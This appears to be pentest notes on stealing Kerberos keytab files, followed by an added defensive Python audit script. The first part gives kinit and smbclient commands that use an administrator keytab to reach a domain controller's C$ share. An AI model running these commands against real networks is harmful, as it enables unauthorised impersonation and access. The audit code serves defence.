Stealing Keytab files
If we discover keytab files, we can use these maliciously to gain access to other systems as the domain administrator. To use the file in a script run by the root user, we will use the following syntax.
kinit [email protected] -k -t /tmp/administrator.keytab
Renew the ticket without entering a password:
kinit -R
Now that our root user has the keytab files loaded, we can authenticate as the domain admin and access any resources they have access to. Let’s attempt to access the domain controller’s C drive.
smbclient -k -U "CORP1.COM\administrator" //DC01.CORP1.COM/C$
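
A defensive counterpart to the steps above, added here as an example and not part of the original page: a Python audit that finds keytab files by their leading magic bytes (0x05 followed by version 0x01 or 0x02) rather than by extension, and flags loose permissions or storage in a world-writable directory such as /tmp. The function names and the sample files in demo() are constructed for illustration.

```python
import os
import stat
import tempfile

KEYTAB_MAGIC = (b"\x05\x01", b"\x05\x02")  # keytab file format versions 1 and 2

def is_keytab(path):
    """True if the file starts with the keytab magic, whatever its name or extension."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2) in KEYTAB_MAGIC
    except OSError:
        return False

def audit_keytabs(roots):
    """Walk the given directories; return (path, [issues]) for every keytab found."""
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            dir_mode = os.stat(dirpath).st_mode
            for name in files:
                path = os.path.join(dirpath, name)
                mode = os.lstat(path).st_mode
                if not stat.S_ISREG(mode) or not is_keytab(path):
                    continue  # skip symlinks, FIFOs, devices and non-keytab files
                checks = [(mode & 0o044, "readable by group/other"),
                          (mode & 0o022, "writable by group/other"),
                          (dir_mode & 0o002, "in a world-writable directory")]
                findings.append((path, [msg for bad, msg in checks if bad]))
    return findings

def demo():
    """Constructed sample: two fake keytabs (magic bytes only) and one unrelated file."""
    with tempfile.TemporaryDirectory() as tmp:
        samples = {"administrator.keytab": (b"\x05\x02", 0o644),
                   "svc.bin": (b"\x05\x02", 0o600),
                   "notes.txt": (b"hello", 0o644)}
        for name, (data, mode) in samples.items():
            path = os.path.join(tmp, name)
            with open(path, "wb") as fh:
                fh.write(data)
            os.chmod(path, mode)
        return {os.path.basename(p): i for p, i in audit_keytabs([tmp])}

if __name__ == "__main__":
    for name, issues in sorted(demo().items()):
        print(name, "->", issues or ["ok"])
```

Run audit_keytabs over home directories, /tmp, /var/tmp and application directories; any keytab reported with issues should be moved to a root-owned location with mode 0600 and its principal's keys rotated.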